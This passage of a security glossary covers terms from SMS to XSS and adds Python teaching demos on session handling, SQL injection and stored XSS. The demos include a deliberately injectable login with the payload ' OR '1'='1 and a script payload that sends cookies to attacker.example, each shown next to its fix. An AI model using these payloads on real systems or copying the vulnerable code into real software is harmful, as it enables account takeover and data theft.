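    store = SessionStore(clock=lambda: now[0])
    sid = store.create()
    now[0] += IDLE_TIMEOUT + 1
    return store.get(sid) is None


if __name__ == "__main__":
    print("fixation defeated:", fixation_scenario())
    print("idle session expired:", timeout_scenario())
```

A real deployment would additionally mark the cookie Secure and HttpOnly and enforce an absolute lifetime as well as the idle one; the regeneration step is the part most often forgotten.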

Short Message Service (SMS)

A service provided by cellular networks that allows the sending and receiving of short messages between users. SMS is more popularly known as "texting."

Simple Mail Transfer Protocol (SMTP)

Protocol used for e-mail exchange.

SIP user agent (UA)

A network endpoint that is enabled to function as either a SIP user agent client or a SIP user agent server.

SIP user agent client (UAC)

A SIP user agent that makes requests and receives responses.

SIP user agent server (UAS)

A SIP user agent that receives requests and returns responses, the counterpart of the UAC. A single endpoint acts as a UAC when it originates a request and as a UAS when it answers one; relaying requests and responses between user agents is the job of a SIP proxy server, not of the UAS.

Skype

Software application that allows the user to make video and audio calls over the Internet.

Social engineering

A practice of obtaining confidential information by manipulating users in social communication.

Social media

A blanket term that describes social applications, including forums, message boards, blogs, wikis, and podcasts. Social media applications include Facebook, Twitter, and YouTube.

Social networking

An online service designed to establish friendships and find like-minded people.

Software Configuration Management (SCM)

The mechanisms used to track and control changes in software.

Software Development Life Cycle (SDLC)

The process of planning, designing, creating, testing, deploying, and maintaining software.

Software stress testing

A software testing method that pushes an application to its limits to see where the breaking points are. Stress tests go well beyond normal, real-world scenarios trying to find the limits of an application.

Software as a Service (SaaS)

A model of software deployment or service where customers use applications on demand.

Spam

Unwanted and unsolicited e-mail.

Spyware

A form of malware that covertly gathers system information through the user's Internet connection without his or her knowledge.

SQL injection attack

An attack in which input supplied to an application is incorporated into a SQL statement and interpreted as part of the query, allowing the attacker to read, modify, or delete data or to bypass authentication. It results from building queries by string concatenation; parameterized queries prevent it.
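
The following is an added example, not code from the glossary, using an in-memory SQLite database with two constructed user rows. `login_vulnerable` splices the supplied username and password into the SQL text, so the classic payload `' OR '1'='1` turns the WHERE clause into a tautology and matches every user without a valid password. `login_safe` passes the same values as bind parameters, which the database never interprets as SQL. Because identifiers such as a sort column cannot be bound, `list_users` validates them against an allow-list instead; that part covers the "Input validation" entry as well. Plaintext passwords are used only to keep the demo short.

```python
"""SQL injection: string concatenation versus parameterized queries (added example)."""
import sqlite3


def make_db():
    """Constructed in-memory database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable on purpose: untrusted input becomes part of the SQL text."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    # With password = "' OR '1'='1" the clause becomes
    #   ... AND password = '' OR '1'='1'   which is true for every row.
    return [row[0] for row in conn.execute(query).fetchall()]


def login_safe(conn, username, password):
    """Parameterized: the driver sends values separately from the statement."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return [row[0] for row in rows]


ALLOWED_SORT = {"username", "role"}


def list_users(conn, sort_by):
    """Column names cannot be parameters, so validate them against an allow-list."""
    if sort_by not in ALLOWED_SORT:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    return [r[0] for r in conn.execute(f"SELECT username FROM users ORDER BY {sort_by}")]


def demo():
    """Run the vulnerable and safe login with the same injection payload."""
    conn = make_db()
    payload = "' OR '1'='1"
    return {
        "vulnerable_with_payload": sorted(login_vulnerable(conn, "alice", payload)),
        "safe_with_payload": login_safe(conn, "alice", payload),
        "safe_with_real_password": login_safe(conn, "alice", "s3cret"),
        "list_by_role": list_users(conn, "role"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:25} -> {v}")
```

The safe version returns no rows for the payload because the bound value is compared literally, quote characters and all; the application never needs to "escape" anything.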

Standard

An established and proven norm or method. A standard provides a means of ensuring quality by setting a uniform expectation for development.

Store-and-forward communication

The technique of relaying communications between two or more users by intermediate storage. Delivery from sender to a central storage is immediate, but the final transmission to the recipient depends upon availability and a request for the stored information.

Stored XSS attack

An attack that embeds malicious script into a Web page that permits and stores user-supplied content, such as a social networking site or an online forum, where it will be accessible to multiple potential victims. The victim retrieves the malicious script from the Web server when it requests the stored information. Also known as a persistent XSS attack.

System access control list (SACL)

The part of a Windows security descriptor that specifies which access attempts on a securable object (successful, failed, or both) generate entries in the security event log. A SACL controls auditing only; which users are permitted access is set by the discretionary access control list (DACL).

System testing

A software testing method that combines all components that have successfully passed integration testing and assesses the system as a whole. System testing tests combined components to determine their interoperability.

T

T.38

A protocol for sending faxes over an IP network or the Internet.

Telnet

A protocol for interactive, text-based access to a remote machine. Telnet sends everything, including login credentials, in cleartext, so SSH has replaced it for remote administration.

Theft

The unauthorized use of goods or services.

Transmission Control Protocol/Internet Protocol (TCP/IP)

The suite of protocols on which the Internet is built: IP routes packets between networks, and TCP provides reliable, ordered, connection-oriented delivery on top of it.

Transport Layer Security (TLS)

The successor to Secure Sockets Layer (SSL). TLS runs above TCP and gives an application protocol such as HTTP (HTTPS) confidentiality, integrity, and server (optionally also client) authentication. It protects the connection between the two endpoints of the TLS session; a proxy or load balancer that terminates TLS sees the plaintext.

Triple Data Encryption Standard (3DES)

An encryption method that applies DES three times with three 56-bit keys (168 bits of key material, but only about 112 bits of effective security because of meet-in-the-middle attacks). A two-key variant also exists. 3DES is deprecated in favor of AES.

Trojan horse

Malware disguised as, or hidden inside, a legitimate-looking application so that the user installs or runs it willingly. It commonly introduces backdoor access for the attacker.

Trust icons

Trust logos and icons used to associate a Web site with a known and trusted entity.

U

Unified collaborative communications (UCC)

Integration of voice, video, and Web or data conferencing. See also unified communications.

Unified communications

The combination of real time and non-real time into a single communication strategy. See also unified collaborative communications (UCC).

Unified messaging (UM)

The storage of fax, e-mail, and voice communications in a single location.

Unit testing

A software testing method in which a programmer verifies that individual units of source code are fit for use. A unit is the smallest testable part of an application.

Unix-to-Unix Copy Protocol (UUCP)

A protocol that emerged prior to high-speed Internet connections, which permitted the exchange of e-mail and Usenet news over dial-up link speeds.

Usability testing

A software testing method designed to check the usability of an application. This may be done in a limited production environment to get a sampling of potential application users. The usability test helps ensure that the application is user friendly and provides an intuitive interface.

Usenet

The first Internet discussion service, started around 1980.

V

Veronica (Very Easy Rodent-oriented Net-Wide Index of Computerized Archives)

A search tool used across the Gopher network.

Virtual private network (VPN)

An encrypted tunnel used to connect a remote client (or a remote site) to a private network across an untrusted network such as the Internet.

Virtualization

The creation of a virtual version of actual services, applications, or resources.

Virus

Malicious code that attaches itself to a host program or file and spreads when that host is executed or shared. Unlike a worm, it cannot propagate to another computer on its own without human action.

Voice messaging

The storage of voice messages for later retrieval.

Voice over Internet Protocol (VoIP)

Technology allowing voice transmissions over the Internet.

Vulnerability management

The ongoing process of discovering, prioritizing, and remediating or mitigating vulnerabilities in systems and applications, typically through regular scanning, tracking of findings, and patching.

W

Web 1.0

The infancy stage of the Web (1990-2003), based on presentation of information towards the users. Also referred to as the Static Web.

Web 2.0

Web advancements between 2003 and 2010, where social networking activities and tools greatly improved. Also referred to as the Social Web.

Web 3.0

The stage of the Web expected between 2010 and 2020. The focus will shift from documents and their relationships to data and its meaning, with services that are personally relevant to the user. Also referred to as the Semantic Web.

Web application

A software program containing computer scripts that interact with the end user. Examples include Web mail, shopping carts, portals, games, forums, forms, online auctions, and other interactive Web page elements.

Web Application Security Consortium (WASC)

A nonprofit group dedicated to improving application security practices.

Web ontology language (OWL)

A collection of languages used for describing ontologies.

Web site defacement

A type of attack in which the attacker changes the appearance of a Web site. The attacker might replace a company's home page, for example, with a Web page that displays messages from the attacker.

White box testing

A software testing methodology that examines the code of an application. This contrasts with black box testing, which focuses only on inputs and outputs of an application.

Whitelist

A practice of explicitly defining what is acceptable (for example, permitted characters, file types, or hosts) and rejecting everything else. Also called an allowlist; it is the opposite of a blacklist, which enumerates only what is forbidden and therefore misses anything the list does not anticipate.

Wide area network (WAN)

A data communications network that encompasses a large geographical area and extends beyond the boundaries of a local area network.

Wi-Fi Protected Access (WPA)

A security protocol for 802.11 wireless LANs that replaced WEP, providing authentication and data encryption (TKIP in WPA; AES-CCMP in WPA2).

World Wide Web

Commonly called the Web, a collection of HTML documents, audio, and video that resides on the Internet, which is accessible by browsers using the HTTP protocol.

Worms

Self-replicating malware that spreads to other systems over a network on its own, typically by exploiting a vulnerability, without needing a host file or any user action.

X

XML Path (XPath) language

A language for navigating XML documents and retrieving data from them. Applications frequently build XPath queries from user input, which is what makes XPath injection possible.

XPath injection attack

An attack in which the attacker supplies input that is incorporated into an XPath query, so that the application executes an attacker-controlled query. When successfully exploited, this vulnerability may allow an attacker to bypass authentication mechanisms and read XML data without proper authorization. Because XPath has no notion of privileges or table boundaries, a single injection can expose the entire document.

XSS attack

An attack in which an attacker's script is delivered through a Web application (stored on the server, reflected from a request, or injected through the page's own client-side code) and runs in a victim's browser with the privileges of the site. The script can read session cookies and page content, perform actions as the victim, or redirect the victim elsewhere; it does not give the attacker access to the Web server itself.
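As an added illustration of both the stored XSS entry and this one (example code, not from the original glossary): a forum page rendered twice from the same stored posts, once by concatenating the raw text and once with output encoding. The posts, the user names and the attacker.example host are constructed for the demonstration.

```python
import html

# Constructed sample forum posts; the second is from an attacker. The payload
# is one arbitrary script; any <script> or event-handler markup would do.
POSTS = [
    ("alice", "Has anyone tried the new build?"),
    ("mallory", "<script>document.location='https://attacker.example/?c='"
                "+document.cookie</script>"),
]


def render_unsafe(posts):
    # Stored content is concatenated into the page as-is, so mallory's <script>
    # element becomes part of the HTML and runs for every visitor who loads it.
    return "".join(f"<li><b>{user}</b>: {body}</li>" for user, body in posts)


def render_safe(posts):
    # html.escape turns <, >, &, " and ' into entities, so the browser shows the
    # payload as text instead of parsing it as markup.
    return "".join(
        f"<li><b>{html.escape(user, quote=True)}</b>: "
        f"{html.escape(body, quote=True)}</li>"
        for user, body in posts)


def render_attribute_safe(user, body):
    # The same data placed inside an attribute: quote=True is what stops a
    # value like  x" onmouseover="alert(1)  from closing the attribute and
    # adding an event handler.
    return (f'<li title="{html.escape(user, quote=True)}">'
            f'{html.escape(body, quote=True)}</li>')


def csp_header():
    # Defense in depth: even if escaping is missed somewhere, a Content
    # Security Policy without 'unsafe-inline' blocks inline <script> elements.
    return {"Content-Security-Policy": "default-src 'self'; script-src 'self'"}


if __name__ == "__main__":
    print(render_unsafe(POSTS))
    print(render_safe(POSTS))
```

Escaping must match the context the data lands in: HTML body, attribute value, JavaScript string and URL each need different encoding, which is why templating engines that escape by default are preferred over hand-built string concatenation.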
